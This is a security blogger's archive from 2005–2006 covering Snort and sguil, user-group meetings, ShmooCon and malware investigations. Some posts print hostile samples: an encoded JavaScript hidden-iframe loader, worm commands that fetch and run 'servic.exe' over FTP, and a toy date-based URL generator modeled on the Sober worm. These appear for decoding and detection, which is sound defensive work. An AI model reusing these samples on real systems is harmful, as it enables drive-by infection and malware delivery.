My home LAN's firewall router died last night. It was an old Linksys with which I was fairly satisfied: cheap, quiet, light on power, and of course, it kept people off my network. When it died, I was kind of annoyed (I'd only had it about 18 months), but I'd seen this coming for a few days. Firewall crashes, DHCP problems and the unexplained inability to access the management port while Internet access still worked had become the normal state of affairs. This is all to say that I'd been looking around.

Since I'm a hands-on kinda guy, I have been looking around at some of the specialized firewall OS distributions, all Open Source. The leader here seems to be m0n0wall, which is a stripped down OpenBSD. When my firewall finally died, I had already downloaded the distribution CD image (about 5MB), but hadn't tried it out yet. So of course, I figured "no time like the present."

I was very pleasantly surprised to learn that the whole installation and configuration experience took me only about 20 minutes. About half that time was spent removing a network card from an older system, adding it to the firewall box, and burning the ISO image to a CD-R.

I started by booting the CDROM and configuring the NICs. Not being a BSD user, I would never have guessed that my interfaces were named things like dc0 or xl0, but fortunately m0n0wall has a nifty autodetection routine that will detect which cards you have available and which is plugged into the LAN or the WAN side of your network. I didn't have to know anything about BSD NICs, so that was nice.

After that, everything was done via the web interface. I plugged in my powerbook (yay for the magic no-crossover-cable-required Ethernet port!) and started configuring. If you're used to consumer grade products like my old Linksys, you'll be glad to hear that m0n0wall supports HTTPS connection security, although not by default. In what is probably the only gotcha in the whole process, m0n0wall will not generate a unique SSL certificate for you, so you're sharing the same cert used by every other m0n0wall owner. If you haven't changed the certificate, you have no security. There is a GUI interface to upload your own certificate, but you have to generate it yourself. M0n0wall won't do this for you.

Shortly thereafter, I had the whole thing up and running. NTP, DHCP server & client, Dynamic DNS and traffic shaping. I even had the chance to try out some of the snazzy statistics features, like the interface usage graphs, which are very impressive. Take that, Linksys!

Overall, I'm very impressed with the software. The hardware is a stock PC, though, which eats power and generates noise. The m0n0wall software also supports the Soekris 45xx and 48xx series systems, which seems like a good platform for this application. I'll probably try this eventually, but in the meantime I'm loving the creamy m0n0wall goodness.

Update 2006-02-02 09:21: Sorry, m0n0wall is a stripped down version of FreeBSD, not OpenBSD as I mentioned above.

Wednesday, February 01, 2006

One of the best I've seen

We all know that seemingly innocuous email can hide all manner of nasties. Somehow, we still have the misconception that "I can tell a fake when I see it." Think so? Check out this email purportedly from F-Secure.

I don't mean to gush over the efforts of malware writers, but this is one of the best email social engineering attempts I've ever seen. The email is well written and literate. It purports to address a legitimate problem and offers assistance in solving it. More importantly, it triggers almost none of the usual heuristics users rely on to identify malicious email. The sender has even chosen the spoofed "From:" address carefully, so as to allay any fears that there might be an unwelcome payload. Who could possibly expect bad things from one of the world's leading anti-virus companies?

I say these things not to praise the spammers (who are, after all, greedy scumbags), but to point out that the bar for this sort of attack has been raised. Are your users prepared for this?

Monday, January 30, 2006

John 1.7 released

If you follow such things, John the Ripper 1.7 is out. There are some pretty big-looking performance increases over the 1.6 release, so this is probably worth looking into if you need to crack passwords.

Wednesday, January 25, 2006

Fight back with StopBadware.org

I ran across this USAToday article that introduces a new idea in the fight against adware, spyware and other deceptive software distribution practices: public shaming. StopBadware.org is a clearinghouse for reports of software distributed with pernicious "extras".

The site is run as a cooperative venture between Harvard's Berkman Center for Internet & Society, The Oxford Internet Institute and Consumer Reports WebWatch. Before downloading software, users can check StopBadware.org to see what they're really getting along with that elf-bowling game. It's a community-driven effort that relies on users to submit reports for inclusion in the database, so there are no listings yet (it just opened up today).

This is a fabulous idea. Most legitimate software distributors would be loath to see themselves listed on this site, and maybe it will spur them to clean up their act. However, the best thing about this site is their set of guidelines for software publishers. It reads very much like a software downloader's "bill of rights". For example, clause #2 states:

2. Prohibited Behavior. An application must not engage in deceptive, unfair, harassing or otherwise annoying practices. For example, an application must not:
            (a) use an end user's computer system for any purpose not understood and affirmatively consented to by the end user. This includes: for purposes of consuming bandwidth or computer resources, sending email messages, launching denial of service attacks, accruing toll charges through a dialer or obtaining personal information from an end user's computer such as login, password, or other account information;
            (b) intentionally create or exploit any security vulnerabilities in end user computers to cause the computer to malfunction;
            (c) trigger unwanted pop-ups, pop-unders, exit windows, or similar obstructive or intrusive functionality, that materially interfere with an end user's Web navigation or browsing or the use of his or her computer;
            (d) repeatedly ask an end user to take, or try to deceive an end user into taking, a previously declined action (such as repeatedly asking an end user to change his or her home page or some other setting or configuration);
            (e) redirect browser traffic away from valid DNS entries. (Except for applications that direct unresolved URLs to an alternative URL, provided that the destination page adequately informs the end user of the source of that page); or,
            (f) interfere with the browser default search functionality. (Except that an application may permit an end user to change his or her default search engine with proper disclosure, consent and attribution).

Here's a simple list of 6 things that software should never do, yet we see examples of each behavior every day. If software publishers stuck to this list, there would be no need for StopBadware.org. Until they do, though, you know where to look before downloading.

Tuesday, January 24, 2006

Notes from the ISSA/Infragard/ASIS Combined Meeting

Our local chapters of the ISSA, Infragard and ASIS are doing something smart: they're teaming up for quarterly joint meetings. I attended their first joint meeting this evening, and was impressed.

The first order of business after dinner was a brief introductory talk by Cassandra Chandler, the new Special Agent in Charge (SAC) of the local (Norfolk, VA) FBI field office. SAC Chandler only spoke for about five minutes, but she had the audience in the palm of her hand. Infragard is an FBI-sponsored organization, and she emphasized the value that the organization provides to its members and to the FBI. I was very pleased that she pledged not only to continue to support the local chapter, but also to increase the level of support over time. By the end of her pep talk, I was ready to join myself!

The second speaker was Mr. Ron Kidd from the Regional Organized Crime Information Center in Nashville, TN. The ROCIC is one of several law-enforcement-related agencies cooperating on a project called the Automated Trusted Information Exchange (ATIX). ATIX is a set of online communities where first responders from government and industry get together to share information related to their particular professional field. The idea is to help these responders prepare for disasters (natural or otherwise) by keeping them up-to-date on current happenings that affect their field. For example, there's an ATIX community for public utilities, one for fire and rescue, etc. There was even one for the agricultural sector, with the sample page showing an article on agroterrorism.

ATIX provides its members a secure forum for posting news, information, links, articles, emails and other information of interest to first responders. Think "Internet Storm Center meets Wikipedia". A good idea, though it seems onerous to get to (you need their special access software, no doubt Windows-only) and, as the comparison to Wikipedia implies, there is essentially no fact-checking done for the information submitted by users. Still, there are useful features, like the page where you type in any cargo container ID number and it tells you the contents.

The theme for the evening was that we need more information sharing among the good guys. I agree wholeheartedly, but I was left wondering "Where are the people who make it all happen?" Our local ISSA, ASIS and Infragard chapters seem to be very management heavy, but light on the technical folks who can actually understand the issues and are in positions to do something about them. That's regrettable, and makes me wonder if these groups are having as much effect as they could.

On a side note, I did score this cool medallion from a friend of mine at the Navy Network Warfare Command, in return for a tour of our facilities. He's one of the people who "make it all happen", so I'm glad he goes to these meetings. Now if we can only get a few more like him to get out there and do some of that other kind of networking, we might have a shot at keeping ahead of the Bad Guys.

Monday, January 23, 2006

February HRSUG Meeting Announcement

The February meeting of the Hampton Roads Snort Users' Group (HRSUG) will be held at 7:00PM, Wednesday February 8th. We're fortunate enough to have Sourcefire's Judy Novak as our guest speaker. I've included Judy's bio and presentation abstract below. She literally "wrote the book" on Intrusion Detection, so I know you won't want to miss her presentation!


Date: 8 Feb 2006
Time: 7:00PM
Place: Williamsburg Regional Library
515 Scotland Street
Williamsburg, VA
(757) 259-4040

Judy Novak's Bio
Judy Novak is a research engineer on Sourcefire's Vulnerability Research Team where she mangles packets for fun and research. She is the co-author of "Network Intrusion Detection". She has written and still maintains SANS "Intrusion Detection In-Depth" courseware. She has several patents pending for work performed at Sourcefire in passive operating system detection and target-based identification of fragmentation and TCP stream reassembly.

Presentation Abstract
Judy's presentation, entitled "Target-Based TCP Stream Segment Overlaps", discusses current research and future functionality of Snort's upcoming stream5 TCP preprocessor. She will demonstrate how overlapping TCP segments can be used to identify a remote operating system by crafting packets using a tool known as scapy. This talk assumes the audience has a basic understanding of TCP.

Tuesday, January 17, 2006

ShmooCon 2006 Wrap Up

Having recently returned from ShmooCon 2006 (and having further spent most of yesterday resting and recovering), here's my brief writeup: "Go next year."

Ok, here's my slightly less brief writeup. I arrived around 1:00PM Friday. Giant kudos to the registration team, who checked me in without delay. In fact, they checked in nearly everyone without delay, thanks to the nifty bar codes they emailed to the registered attendees. Print it out, scan it and get a conference bag. It was great. What was even better was that the badges had no name tag. They were just (sharp) metal access tokens, and if you had one around your neck, you were in. Good for anonymity, though a little annoying at times when I thought I should know someone's name but didn't.

I don't want to give a blow-by-blow account, because

  1. that's boring
  2. others have done it better
  3. it's still boring

I would like to mention several of my favorite presentations, though, in roughly chronological order.

First, Dan Moniz and Patrick Stach presented their work on creating an exhaustive rainbow table for LANMAN ("Breaking LanMan Forever"), which was a little math-y but in the end they've made the results available. The good thing about this is that by going for a guaranteed complete coverage instead of a statistical coverage, they reduced the number of tables you have to search through to find password hashes, and avoiding the overlap speeds things up a lot. Good job guys.

Second, Acidus' talk on "Covert Crawling" (a spider that is indistinguishable from a set of human visitors) was pretty fun. Nothing terribly high-tech, but he's thought through a lot of the problems and solved most of them. Should be good code when it's released.

Dan Kaminsky's talk on "Black Ops of TCP/IP 2005.5" was, of course, stellar. IP fragmentation timing attacks. Genius.

I also enjoyed Lasse Overlier and Paul Syverson's talk on detecting hidden services in Tor, and the upcoming countermeasures to these attacks. Makes me want to go right out and hide something!

Deviant Ollam's lockpicking talk scared the hell out of me, and I've pretty much sworn off all locks by now. Only trained attack dogs for me from now on.

And of course, the highlight of the con was Johnny Long's "Hacking Hollywood" presentation. The image of hackers and hacking in the movies has always fascinated me, and it was nice to see such an informed send-up. Hilarious and timely. I can't wait for the video to be released!

So, this was my first ShmooCon, but it won't be my last!

PS. Richard Bejtlich and I did a talk on sguil. It went well, I thought. In case you were wondering.

Monday, January 09, 2006

January HRSUG Meeting Reminder

I'd like to remind everyone that the January meeting of the Hampton Roads Snort Users Group (HRSUG) will be held this Wednesday, January 11th at 7:00PM. This will be an important meeting, since we will open the nominations for the positions of Chair and Vice Chair. These are light-duty positions, mostly consisting of filling out the library's reservation sheets every month to get the meeting room and helping to arrange for a presentation. Please consider nominating yourself or another member for one of these positions.

As for a technical presentation, I will be demoing sguil, an open source Network Security Monitoring (NSM) tool. Sguil incorporates NIDS information (snort), network session data and packet logging into a single analyst console/research tool. I'll be showing how sguil can help you save time, save money and improve your detection program at the same time. Part of the presentation details exactly how I used sguil to investigate an attempted WMF exploit being delivered by popup ads. If the Internet connection works out, we can even do a live demo.

Location details are below. Hope to see you there!


Date: 11 Jan 2006
Time: 7:00PM
Place: Williamsburg Regional Library
515 Scotland Street
Williamsburg, VA
(757) 259-4040
Meeting room B

Thursday, January 05, 2006

Sguil at ShmooCon 2006

Going to ShmooCon 2006 next week? So is sguil! Fellow sguil project member Richard Bejtlich will present sguil in a talk entitled Network Security Monitoring with Sguil. As part of this session, Richard has invited me to present a case study on how I used sguil to investigate my recent WMF exploit attempt. Should be a lot of fun!

Wednesday, January 04, 2006

How to pwn a million computers without breaking a sweat

There has been a lot of discussion about the Microsoft WMF vulnerability recently, and I frankly don't feel that I have much to add. You're either already taking preventative measures, you're awaiting the patch, or both. But I came across a particular infection attempt today which, while not unusual, is a good example of how an exploit for this sort of vulnerability could get delivered to a victim's PC even without them necessarily doing anything "risky". It happens to involve a WMF file, but I've seen it in the past with other types of image-related vulnerabilities as well.

IMPORTANT SAFETY NOTE: This information is based on an actual incident. I have obscured the names of most of the systems involved in part to protect the reputations of their owners, but mostly to prevent people from trying to click on them.

The scenario begins as the user (we'll call him Fred) is browsing through a popular website, in this case MySpace.com, though the site itself wasn't involved in the attack. I only mention it because it's the start of the "web session" the user was involved in, so it seemed like a logical place to pick up the narrative.

In case you don't have a teenager, MySpace is a free online community that's insanely popular <old_fart>amongst the youth of today</old_fart>. It's kind of like a cross between a free website host, a blog and IM all rolled into one. The point is that each MySpace user gets their own web page/blog/buddy list/chat board page to do with as they wish. Other registered MySpace users can post messages of their own on the page when they visit, and these are automatically tagged with the visitor's name and personalized photo or icon. Later, when someone views the comments, any of the posters who happen to also be using MySpace at the time will also have a special "online" indicator displayed beside their name.

All these messages, icons and status indicators are user-customizable, and this drives many people to learn some basic HTML. Of course, if you don't feel like learning HTML, you can go to any number of websites that will generate HTML on the fly for you to paste into your own web pages.

So Fred was viewing someone's MySpace page, and apparently one of the posters was online at the time. That caused their "online status" icon to be displayed along with their name, and apparently this was linked back to one of these HTML helper websites, from which it had originally been generated. We'll call the site HTMHelper (not the real name, but the exact site isn't important either).

Here's where it starts to get interesting.

HTMHelper has many pages and is quite extensive. To help support the service, the site owners have made deals to display ads from several ad distribution companies. The HTMHelper page contained a small bit of JavaScript code to generate "pop under" ads (like popups, but they appear under your browser window so you don't see them until later). The ad provider, let's call them cash4popupads.com, is part of a whole chain of (often sleazy) ad brokers, and it's quite common for ad brokers to get ads from other ad brokers, who got them from still other ad brokers, and so on. Ultimately, there is an individual who registers with one of these ad distribution services, but there are usually several levels between the person placing the ads and the service that eventually puts them on a web page where you'll see them.

In this case, cash4popupads displayed a popunder window that contained nothing but a redirection to the real ad, hosted on a server operated by a site we'll call spf99.biz. Technically, it was an invisible 1 pixel square IFRAME, but you get the idea. cash4popupads was just the conduit, while spf99 served the ad itself.

Spf99 is registered in Herndon, VA, by the way. It doesn't make any difference to this story, but it's an interesting fact. There are a lot of government agencies and government contractors in that area, since it's basically part of the whole Washington DC/Northern VA megalopolis, but that could just be a geographical coincidence. I have no way of knowing, but it did make me wonder.

Spf99 served up the actual infected file, "/tape/XXXXX101.wmf". Their internal tracking number indicates that this file was supplied by customer number 101 ("affiliate=101" was part of the URL). I don't know who affiliate 101 is, and it could very well be another ad distribution company.

In case you missed the implication, ad services don't work for free. Everyone along the way has to take a cut from every ad delivery and/or clickthrough. This means that whoever supplied the file had enough money to pay for it to be widely distributed through the various levels of the ad networks.

If you've followed the security news through 2005, you'll know that the lone hacker is on the way out, and nation states and organized crime are where the serious hacking is going on now. This is a good example of that trend. In the past, someone would get a website with a free hosting provider and then try to get people to visit their site by sending spam, posting to discussion forums or using some similar technique. That's inefficient, so now they just pay ad networks to distribute their exploits for them. They don't do this unless they're expecting a healthy return on their investment, of course.

Anyway, I thought this might be an interesting peek into the seamy side of exploit distribution, and quite timely too, since we've recently been discussing this particular exploit. Hope you enjoyed it.

Update 2006-01-05 06:49:00
I should have mentioned this before, but all this analysis was made possible by sguil. A Snort alert tipped me off to the exploit attempt itself, and I generated an ASCII session transcript from the packet logs to verify it. I was then able to search through all network sessions involving the target machine around that time, and used additional transcripts of those sessions to establish the chain of events leading up to the exploit attempt itself. I even recovered the WMF file from the packet logs and was able to search network sessions for the download server listed within, which was a great way to verify that the exploit had not been successful. Network Security Monitoring to the rescue!
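
For the curious, the "search through all network sessions" step is really just a query against Sguil's SANCP session database. Here's a minimal Perl/DBI sketch of the kind of query involved; the database name, credentials, victim IP and time window are made up for illustration, and the table/column names assume a typical Sguil sancp schema, so adjust for your own sensor:

#!/usr/bin/perl
# Minimal sketch: list all sessions involving a given host during a time window.
# The connection details, victim IP and dates below are hypothetical examples.
use strict;
use warnings;
use DBI;

my $victim = '192.168.1.50';    # hypothetical victim IP
my $dbh = DBI->connect('DBI:mysql:database=sguildb;host=localhost',
                       'sguil', 'password', { RaiseError => 1 });

# Sguil stores IP addresses as unsigned ints, so convert with INET_ATON/INET_NTOA.
my $sth = $dbh->prepare(q{
    SELECT start_time, INET_NTOA(src_ip), src_port,
           INET_NTOA(dst_ip), dst_port, ip_proto
      FROM sancp
     WHERE (src_ip = INET_ATON(?) OR dst_ip = INET_ATON(?))
       AND start_time BETWEEN ? AND ?
     ORDER BY start_time
});
$sth->execute($victim, $victim, '2006-01-04 00:00:00', '2006-01-04 23:59:59');

while (my @row = $sth->fetchrow_array) {
    print join("\t", @row), "\n";
}
$dbh->disconnect;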

Tuesday, January 03, 2006

ISC is getting cranky

Judging by their latest entry, the Internet Storm Center is experiencing just a little frustration over the whole Microsoft WMF thing. I can't say that I blame them at all; I just think it's amusing. Microsoft's response to the whole thing has been a farce.

Sguil is not a SIM

While catching up on the mailing list traffic I skipped over the holidays, I read this post on DailyDave. The email deals with SIM technology, specifically the feasibility of a good Open Source SIM. The section below (by Anton Chuvakin) caught my eye:

IMHO, Sguil follows a wrong model, since it requires a smart analyst in front of the console, something that most companies likely won't afford.

I don't want to start a fight, but I've been seeing a lot of recent references implying that sguil is a SIM, or that it competes with/replaces SIMs. That could not be further from the truth. Here's the reply I sent to the mailing list:

Don't confuse sguil with a SIM. SIM implies a level of aggregation and automation that is not appropriate for this type of Network Security Monitoring (NSM) tool. Although there are superficial similarities, they're not intended for the same purpose.

Sguil is simply a research tool for a number of specialized databases (starting with NIDS, session and pcap data). It relies on a trained analyst simply because it's not possible to do otherwise. The Bad Guys are smart, and their capacity for underhandedness far exceeds the ability of software to detect or respond. Trained security personnel are indispensable not only for their ability to detect misuse, but also for their reasoning skills and their investigatory capacity. These are the sorts of operations sguil is designed to support.

If you want to talk about following the wrong model, trying to replace trained security personnel with a software solution is pretty high up on the list.

My fellow #snort-gui channel monkey jofny also had this to say:

A SIM's job is to present analysts with event combinations of interest which are unusual or otherwise show additional evidence of being worth investigating beyond what is presented by individual sensors/events

This is entirely correct, and it really points to the difference between NSM and SIM. Although a SIM might tip you off about a possible problem, you need a dedicated NSM solution (like sguil) to support a more detailed analysis. This implies that it's quite possible, and maybe even desirable, to run both SIM and NSM solutions in a complementary fashion.

I hope this clears things up a bit.

Update 2006-01-03 13:13: TaoSecurity has picked this up, too. I especially like the detailed comment someone left.

Thursday, December 22, 2005

Decoding JavaScript document.write() alerts

I got some good feedback on my previous post about decoding HTTP challenge/response alerts, so I thought I'd try again. This time, the topic is decoding JavaScript document.write() alerts.

JavaScript includes a method for a script to modify the current web page (the "document"). The document.write() function call is used to add new content to the page, and this can also add new JavaScript code to be executed. This is a common obfuscation technique, often intended to make it more difficult for analysts or NIDS to detect questionable content.

Here's an example to show what this looks like in the real world:

document.write(String.fromCharCode(60,115,
99,114,105,112,116,32,108,97,110,103,117,
97,103,101,61,34,74,97,118,97,83,99,114,
105,112,116,34,32,116,121,112,101,61,34,
116,101,120,116,47,106,97,118,97,115,99,
114,105,112,116,34,62,60,33,45,45,13,10,
100,111,99,117,109,101,110,116,46,119,
114,105,116,101,40,39,60,105,102,114,97,
109,101,32,115,116,121,108,101,61,34,100,
105,115,112,108,97,121,58,110,111,110,
101,34,32,119,105,100,116,104,61,34,49,
34,32,104,101,105,103,104,116,61,34,49,34,
32,102,114,97,109,101,98,111,114,100,101,
114,61,34,48,34,32,115,99,114,111,108,108,
105,110,103,61,34,78,111,34,32,115,114,99,
61,34,104,116,116,112,58,47,47,115,46,101,
117,119,101,98,46,99,122,47,39,43,40,40,40,
110,61,77,97,116,104,46,102,108,111,111,
114,40,52,53,42,77,97,116,104,46,114,97,110,
100,111,109,40,41,41,41,60,53,41,32,63,32,39,
115,116,101,112,39,43,40,110,43,50,41,43,39,
46,112,104,112,39,32,58,32,39,101,110,103,
105,110,101,115,46,112,104,112,63,110,111,
61,39,43,40,110,45,52,41,41,43,39,34,62,60,
47,105,102,114,97,109,101,62,39,41,59,13,10,
47,47,45,45,62,60,47,115,99,114,105,112,116,62));

Notice the "String.fromCharCode()" function. That's the key to deciphering this. Each of the numbers in the list is just the decimal ASCII code of the corresponding character in the script that this is intended to create.

Once you realize how this works, reconstructing the script itself is trivial. I usually use the following perl command line, then cut and paste just the list of numbers into its standard input, like so (the pasted input is shown below the command):

% perl -e 'while(<>) { @list = split /,/; grep {print chr($_);} @list; }'
60,115,99,114,105,112,116,32,108,97,110,
103,117,97,103,101,61,34,74,97,118,97,83,99,
114,105,112,116,34,32,116,121,112,101,61,34,
116,101,120,116,47,106,97,118,97,115,99,114,
105,112,116,34,62,60,33,45,45,13,10,100,111,
99,117,109,101,110,116,46,119,114,105,116,
101,40,39,60,105,102,114,97,109,101,32,115,
116,121,108,101,61,34,100,105,115,112,108,
97,121,58,110,111,110,101,34,32,119,105,100,
116,104,61,34,49,34,32,104,101,105,103,104,
116,61,34,49,34,32,102,114,97,109,101,98,
111,114,100,101,114,61,34,48,34,32,115,99,
114,111,108,108,105,110,103,61,34,78,111,
34,32,115,114,99,61,34,104,116,116,112,58,47,
47,115,46,101,117,119,101,98,46,99,122,47,39,
43,40,40,40,110,61,77,97,116,104,46,102,108,
111,111,114,40,52,53,42,77,97,116,104,46,114,
97,110,100,111,109,40,41,41,41,60,53,41,32,
63,32,39,115,116,101,112,39,43,40,110,43,50,
41,43,39,46,112,104,112,39,32,58,32,39,101,
110,103,105,110,101,115,46,112,104,112,63,
110,111,61,39,43,40,110,45,52,41,41,43,39,
34,62,60,47,105,102,114,97,109,101,62,39,
41,59,13,10,47,47,45,45,62,60,47,115,99,
114,105,112,116,62


I've omitted the actual output here, since it would be JavaScript and I don't want to load the code into your browser by accident, but feel free to try this on your own and see what JavaScript nuggets you can dig up.
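
By the way, if you'd rather not trim the document.write() and String.fromCharCode() wrappers by hand, a slight variation pulls every run of digits out of the whole blob. This is just a convenience sketch; save the encoded snippet to a file first (say, encoded.txt):

perl -0777 -ne 'print chr($_) for /(\d+)/g;' encoded.txt

The same caution applies: the output is live JavaScript, so be careful where you paste it.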

Thursday, December 15, 2005

China refutes hacking charges

I mentioned Titan Rain several months ago, but it's back in the press again, mostly because Alan Paller is using it to flog the new SANS Technology Institute.

No matter. It's news again, and this time China is coming out with a stunning defense. From The Standard:

"We have clear stipulations against hacking. No one can use the Internet to engage in illegal activities," foreign ministry spokesman Qin Gang told a regular briefing Tuesday.

"The Chinese police will deal with hacking and other activities disturbing social order in accordance with law."

I also enjoyed this quote:

"I'm not sure about the American accusations," Qin said.

"If they have proof, they should tell us."

Now, I'm not saying that I think the Chinese government is sponsoring this. I'm also not saying that I think they're innocent. The fact is, we don't know. Despite Paller's ludicrous assertion that these attacks could only have been executed by a military organization, their origin is still a mystery, at least in the open press.

So what is my point? Simply that, while we don't know for sure, I do find it very plausible that the Chinese government is behind these attacks, either directly or indirectly. China has a long history of espionage. There's a very thorough book, The Tao of Spycraft: Intelligence Theory and Practice in Traditional China that documents this in detail.

Denials count for nothing. If the Chinese government wants us to believe they're not behind the attacks, they should help us investigate and find the attackers. Until that happens, we have to assume that China could in fact be behind the attacks.

Wednesday, December 14, 2005

January HRSUG Meeting Announcement

The January meeting of the Hampton Roads Snort Users Group (HRSUG) will be held on Wednesday, January 11th at 7:00PM. This will be an important meeting, since we will open the nominations for the positions of Chair and Vice Chair.

As for a technical presentation, I will be demoing sguil, an open source Network Security Monitoring (NSM) tool. Sguil incorporates NIDS information (snort), network session data and packet logging into a single analyst console/research tool. I'll be showing how sguil can help you save time, save money and improve your detection program at the same time.

Location details are below. We had a good turnout for the last meeting, and I hope this one will be even better. See you there!


Date: 11 Jan 2006
Time: 7:00PM
Place: Williamsburg Regional Library
515 Scotland Street
Williamsburg, VA
(757) 259-4040
Meeting room B

Saturday, December 10, 2005

Some InstantNSM love

Thanks to my friend and fellow sguil user Geek00L for showing some love to my Network Security Monitoring project, InstantNSM. It's my attempt to make sguil easier to deploy. If you've been scared off by the complexity of NSM, check it out and let me know what you think.

Friday, December 09, 2005

Sguil 0.6.0p1 Released

Ok, it turns out there was a fairly serious "crash-the-server" bug in the 0.6.0 release. If you're using that, you should probably upgrade to 0.6.0p1 immediately.

Thursday, December 08, 2005

Decoding "Challenge/Response Authentication" alerts

If you're using Snort for IDS operations and have downloaded the BLEEDING-EDGE rules, you've probably noticed a lot of alerts called "BLEEDING-EDGE VIRUS HTTP Challenge/Response Authentication". This type of alert may seem quite mysterious, but in reality, this is most likely worm traffic (see the ISC Handler's Diary entry on the subject).

If you look at an ASCII transcript of the traffic (thanks, sguil!), you'll see something like the following:

GET / HTTP/1.0
Host: 192.70.245.110
Authorization: Negotiate IQegYGKwYBBQUCoIIQbjCCE[...]
RERERERERERERERERERERERERERE==

So what is this traffic? Well, IIS allows a client to negotiate the type of HTTP authentication scheme, which is the purpose of the "Authorization: Negotiate" line (more info on this capability can be found here and here). Unfortunately, there is a buffer overflow in some versions of this facility, which could allow the remote execution of arbitrary code. That's what all that extra junk at the end of the request is.

The overflow is encoded in Base64 (as per the Negotiate protocol). Want to decode it and see what's there? Easy! On my Linux box, I used the following Perl command to set up a simple decoder, then cut-and-pasted the ASCII text into the window.

perl -e 'use MIME::Base64; $line = <>; chomp($line); $out = decode_base64($line); print "\n\n$out\n";' |& less
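
If the Base64 blob wraps across multiple lines in your transcript, here's a slight variation on the same idea (just a sketch) that slurps everything you paste and strips the whitespace before decoding; press Ctrl-D when you're done pasting:

perl -MMIME::Base64 -e 'local $/; my $b = <STDIN>; $b =~ s/\s+//g; print "\n\n", decode_base64($b), "\n";' | less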

What you'll see is a bunch of junk, mostly buffer padding and shellcode, but with some plaintext commands visible in the middle. The exact commands vary a bit depending on exactly what code is attacking you, but they usually look similar to this:

cmd /k echo open 192.168.1.101 15801 > o&
echo user 1 1 >> o &echo get servic.exe >> o &
echo quit >> o &ftp -n -s:o &del /F /Q o &
servic.exe

See what that does? It creates an FTP script to log in to a remote host and fetch a file. Then it runs ftp with that script to download the infection code and executes it. It's even sharp enough to delete the temporary FTP script afterward.

One interesting thing to note is that the script seems to use the attacking host's own IP address as the FTP server. In this case, that host was probably behind some sort of NAT firewall, so the infection would have failed to spread even if we had been vulnerable.

Anyway, now you know.

Sober worm pulls an interesting trick...

Check out this article from F-Secure's blog. According to it, Sober.Y has an ingenious method for "calling home" to download updates that resists efforts to block or shut down the URLs it uses.

According to the article, the worm tries to download its updates from URLs which are calculated in part based on the date. The actual URLs themselves aren't registered, but when the owner of the worm wants to send out an update, he simply calculates the day's URL, registers it, and places his content there for download.
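
To illustrate the concept (and this is only a toy illustration, not Sober's actual algorithm), all it takes is a generator that both the worm and its author can run independently for any given date:

#!/usr/bin/perl
# Toy illustration of date-based rendezvous URLs -- NOT the real Sober algorithm.
# The domain suffix and filename are made up.
use strict;
use warnings;

my ($day, $month, $year) = (localtime)[3, 4, 5];
$year += 1900; $month += 1;

# Seed the PRNG with today's date so everyone running this today gets the same name.
# (A real worm would use its own deterministic math so the result is identical on
# every machine; Perl's rand() isn't guaranteed to be.)
srand($year * 10000 + $month * 100 + $day);

my $host = join '', map { ('a'..'z')[int rand 26] } 1 .. 10;
print "http://$host.example.net/update.exe\n";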

It's a bit harder to shut things down if they don't exist yet, but fortunately the F-Secure guys reverse engineered the algorithm, which lets them predict the URLs too. They were apparently the ones who tipped off the German police, who in turn issued a statement last month on the subject.

Neat idea on the part of the author, but now that the algorithm is known, I guess it won't do him as much good as he had hoped.

Wednesday, December 07, 2005

The other gift that keeps on giving

That's the gift of security, of course. Why not take a tip from this Computerworld column and choose Christmas gifts that promote good security practices as well?

If you were writing this list, what would you include?

Tuesday, December 06, 2005

December HRSUG Meeting Report

As both of you who read my blog know, last Thursday was the December HRSUG meeting. Jason Brvenik and Jennifer Steffens from Sourcefire attended our inaugural meeting, as did several members of the local security community.

We started out by discussing some organizational matters, and found that everyone was interested in meeting on a monthly basis. We decided to defer electing officers until people have had a chance to get to know each other a bit; nominations will be taken at the January meeting, with an election to be held in February. In the meantime, we can use the mailing list to introduce ourselves.

With introductions and administrative matters out of the way, Jason gave a talk about the advantages of target-based IDS. The idea is that the more you know about your network, the better you can protect it. In the IDS world, this means that you can provide more accurate detection and perhaps boost performance by telling Snort more about the targets (hosts) on your network. Jason discussed the upcoming snort configuration language changes as well as some neat new realtime updating capabilities for loading new configuration into a running snort process. Expect to see these new features rolled out in stages between now and 2007.

Our presentation was followed by an optional "offsite networking event" which was also quite successful.

In short, I think a good time was had by all. Thanks to everyone who showed up, and I'm looking forward to an even better meeting in January! Stay tuned!

Thursday, December 01, 2005

Sguil 0.6.0 released!

Sguil is the de facto reference implementation for Network Security Monitoring (NSM). Sguil 0.6.0 was released today!

Tired of not having the data necessary to properly follow up on your IDS alerts? Give sguil a try. It integrates alerts (via Snort), network session data and full packet logging into a single easy-to-use analyst console.

For more information about sguil, see my presentation on the subject. Also check out my related project, InstantNSM.

Tuesday, November 29, 2005

Need a better reason to come to HRSUG?

You're probably tired of hearing me talk about it, but the first Hampton Roads Snort Users Group (HRSUG) meeting is this week (details here). As if networking with your peers or listening to our guest speaker weren't enough, there's one more reason to come... free training!

The folks at Sourcefire have donated a training package door prize worth almost $2,000. In short, if you attend and are the lucky winner, you'll get:



I've recently taught both of these classes, and I can tell you from my personal experience that they're very good. The winner will have their choice of instructor-led classroom training or the self-paced online classes. Other meeting attendees can register for the same classes/exam at a 50% discount through December 31st, 2005.

So... you're coming, right?

Monday, November 28, 2005

On the dangers of speaking outside your area of competence

Ok, this is just dumb. According to this article, Richard Carrigan, a physicist at Fermilab, is concerned that aliens (as in E.T.) are going to "infect the Internet". He claims that the signals processed by the millions of computers participating in the SETI@Home distributed computing project are capable of carrying malicious code, and that the SETI project should implement some sort of signal quarantine to protect us. Kind of like a reverse Jeff Goldblum maneuver from Independence Day.

The thing is, this isn't a very likely scenario. For starters, the signals are data, not executable code. That's our first layer of protection.

Now, we could posit a software flaw in the SETI@Home client that could lead to some sort of overflow that allowed arbitrary code to be executed, but in order for aliens to successfully exploit it, they'd need to know an awful lot about how our computers work, and about our current software versions, and the laws of physics are working against them.

The closest star is about 4.5 light years away from Earth. Assuming that we broadcast complete technical details of the x86 architecture and an entire copy of the Windows OS, along with a comprehensive set of security bulletins and an SDK, the round trip at the speed of light means that by the time the "exploit" could arrive here, we'd be about 9 years further on. Let's see, 9 years ago we'd all have been running NT 4 and Windows 95. Good luck trying a Win95 overflow on my XP system! The offsets are wrong, and security technologies exist today that weren't dreamed of then (like the non-executable stack). What will we have 9 years from now? I don't know (and neither do the aliens), but I do know the aliens don't stand a chance.

Seriously, I think he's missing the point. If you want to be concerned with the security of the SETI@Home software or its new replacement, BOINC, don't bring aliens into the picture. Security concerns are legitimate, yes, but it is far more likely that if a software bug does exist that allows remote code execution, it'll be exploited by a human, not an alien.

Unless, of course, you believe this guy.

